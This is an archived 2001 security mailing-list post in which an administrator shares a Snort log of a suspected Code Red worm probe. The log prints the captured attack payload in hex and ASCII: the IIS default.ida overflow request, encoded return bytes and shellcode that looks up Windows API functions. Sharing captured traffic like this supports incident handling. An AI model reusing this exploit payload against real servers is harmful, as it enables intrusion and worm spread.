Anyone else seeing code red scans to port 21 (ftp)? Found this in my snort log: CID:2493 [**] LOCAL/FTP Attempt [**] 2001-09-08 09:57:59 213.160.60.187:3125 -> 64.x.x.x:21 TCP TTL:105 TOS:0x0 ID:48568 IPLen: DgmLen:48 HLen:5 CSumIP:0x6049 ******S* Seq:0x178AEF6A Ack:0x0 Win:0x4000 CSumTCP:0x3C1A TCP Options (4) => MSS:05B4 NO-OP NO-OP SACKOK Payload (Hex): 4745 5420 2F64 6566 6175 6C74 2E69 6461 3F58 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5858 5825 7539 3039 3025 7536 3835 3825 7563 6264 3325 7537 3830 3125 7539 3039 3025 7536 3835 3825 7563 6264 3325 7537 3830 3125 7539 3039 3025 7536 3835 3825 7563 6264 3325 7537 3830 3125 7539 3039 3025 7539 3039 3025 7538 3139 3025 7530 3063 3325 7530 3030 3325 7538 6230 3025 7535 3331 6225 7535 3366 6625 7530 3037 3825 7530 3030 3025 7530 303D 6120 2048 5454 502F 312E 300D 0A43 6F6E 7465 6E74 2D74 7970 653A 2074 6578 742F 786D 6C0A 436F 6E74 656E 742D 6C65 6E67 7468 3A20 3333 3739 200D 0A0D 0AC8 C801 0060 E803 0000 00CC EBFE 6467 FF36 0000 6467 8926 0000 E8DF 0200 0068 0401 0000 8D85 5CFE FFFF 50FF 559C 8D85 5CFE FFFF 50FF 5598 8B40 108B 0889 8D58 FEFF FFFF 55E4 3D04 0400 000F 94C1 3D04 0800 000F 94C5 0ACD 0FB6 C989 8D54 FEFF FF8B 7508 817E 309A 0200 000F 84C4 0000 00C7 4630 9A02 0000 E80A 0000 005F 5F5F 5F5F 5F5F 5F5F 008B 1C24 FF55 D866 0BC0 0F95 8538 FEFF FFC7 8550 FEFF FF01 0000 006A 008D 8550 FEFF FF50 8D85 38FE FFFF 508B 4508 FF70 08FF 9084 0000 0080 BD38 FEFF FF01 7468 53FF 55D4 FF55 EC01 4584 69BD 54FE FFFF 2C01 0000 81C7 2C01 0000 E8D2 0400 00F7 D00F AFC7 8946 348D 4588 506A 00FF 7508 E805 0000 00E9 01FF FFFF 6A00 6A00 FF55 F050 FF55 D04F 75D2 E83B 0500 0069 BD54 FEFF FF00 5C26 0581 C700 5C26 0557 FF55 E86A 006A 16FF 558C 6AFF FF55 E8EB F98B 4634 2945 846A 64FF 55E8 8D85 3CFE FFFF 50FF 55C0 0FB7 853C FEFF FF3D D207 0000 73CF 0FB7 853E FEFF FF83 F80A 73C3 66C7 8570 FFFF FF02 0066 C785 72FF FFFF 0050 E864 0400 0089 9D74 FFFF FF6A 006A 016A 02FF 55B8 83F8 FF74 F289 4580 6A01 5468 7E66 0480 FF75 80FF 55A4 596A 108D 8570 FFFF FF50 FF75 80FF 55B0 BB01 0000 000B C074 4B33 DBFF 5594 3D33 2700 0075 3FC7 8568 FFFF FF0A 0000 00C7 856C FFFF FF00 0000 00C7 8560 FFFF FF01 0000 008B 4580 8985 64FF FFFF 8D85 68FF FFFF 506A 008D 8560 FFFF FF50 6A00 6A01 FF55 A093 6A00 5468 7E66 0480 FF75 80FF 55A4 5983 FB01 7531 E800 0000 0058 2DD3 0300 006A 0068 EA0E 0000 50FF 7580 FF55 AC3D EA0E 0000 7511 6A00 6A01 8D85 5CFE FFFF 50FF 7580 FF55 A8FF 7580 FF55 B4E9 E7FE FFFF BB00 00DF 7781 C300 0001 0081 FB00 0000 7875 05BB 0000 F0BF 60E8 0E00 0000 8B64 2408 6467 8F06 0000 5861 EBD9 6467 FF36 0000 6467 8926 0000 6681 3B4D 5A75 E38B 4B3C 813C 0B50 4500 0075 D78B 540B 7803 D38B 420C 813C 034B 4552 4E75 C581 7C03 0445 4C33 3275 BB33 C949 8B72 2003 F3FC 41AD 813C 0347 6574 5075 F581 7C03 0472 6F63 4175 EB03 4A10 49D1 E103 4A24 0FB7 0C0B C1E1 0203 4A1C 8B04 0B03 C389 4424 2464 678F 0600 0058 61C3 E851 FFFF FF89 5DFC 8945 F8E8 0D00 0000 4C6F 6164 4C69 6272 6172 7941 00FF 75FC FF55 F889 45F4 E80D 0000 0043 7265 6174 6554 6872 6561 6400 FF75 FCFF 55F8 8945 F0E8 0D00 0000 4765 7454 6963 6B43 6F75 6E74 00FF 75FC FF55 F889 45EC E806 0000 0053 6C65 6570 00FF 75FC FF55 F889 45E8 E817 0000 0047 6574 5379 7374 656D 4465 6661 756C 744C 616E 6749 4400 FF75 FCFF 55F8 8945 E4E8 1400 0000 4765 7453 7973 7465 6D44 6972 6563 746F 7279 4100 FF75 FCFF 55F8 8945 E0E8 0A00 0000 436F 7079 4669 6C65 4100 FF75 FCFF 55F8 8945 DCE8 1000 0000 476C 6F62 616C 4669 6E64 4174 6F6D 4100 FF75 FCFF 55F8 8945 D8E8 0F00 0000 476C 6F62 616C 4164 6441 746F 6D41 Payload (ASCII): GET /default.ida?XXX XXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXX X%u9090%u6858%ucbd3% u7801%u9090%u6858%uc bd3%u7801%u9090%u685 8%ucbd3%u7801%u9090% u9090%u8190%u00c3%u0 003%u8b00%u531b%u53f f%u0078%u0000%u00=a HTTP/1.0..Content-t ype: text/xml.Conten t-length: 3379 ..... ...`........dg.6..dg .&.......h......\... P.U...\...P.U..@.... .X....U.=.......=... ...........T....u..~ 0...........F0...... ..._________...$.U.f .....8.....P.......j ...P...P..8...P.E..p .........8....thS.U. .U..E.i.T...,.....,. .............F4.E.Pj ..u...........j.j..U .P.U.Ou..;...i.T.... \&....\&.W.U.j.j..U. j..U....F4)E.jd.U... <...P.U....<...= ....s....>......s. f..p.....f..r....P.d .....t...j.j.j..U... .t..E.j.Th~f...u..U. Yj...p...P.u..U..... ...tK3..U.=3'..u?..h .........l.........` ........E...d.....h. ..Pj...`...Pj.j..U.. j.Th~f...u..U.Y...u1 .....X-....j.h....P. u..U.=....u.j.j...\. ..P.u..U..u..U...... ....w...........xu.. ....`......d$.dg.... Xa..dg.6..dg.&..f.;M Zu..K<.<.PE..u.. T.x...B..<.KERNu.. |..EL32u.3.I.r ...A. .<.GetPu..|..rocAu ..J.I...J$........J. ......D$$dg....Xa..Q ....]..E......LoadLi braryA..u..U..E..... .CreateThread..u..U. .E......GetTickCount ..u..U..E......Sleep ..u..U..E......GetSy stemDefaultLangID..u ..U..E......GetSyste mDirectoryA..u..U..E ......CopyFileA..u.. U..E......GlobalFind AtomA..u..U..E...... GlobalAddAtomA ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Sat Sep 08 2001 - 12:29:28 PDT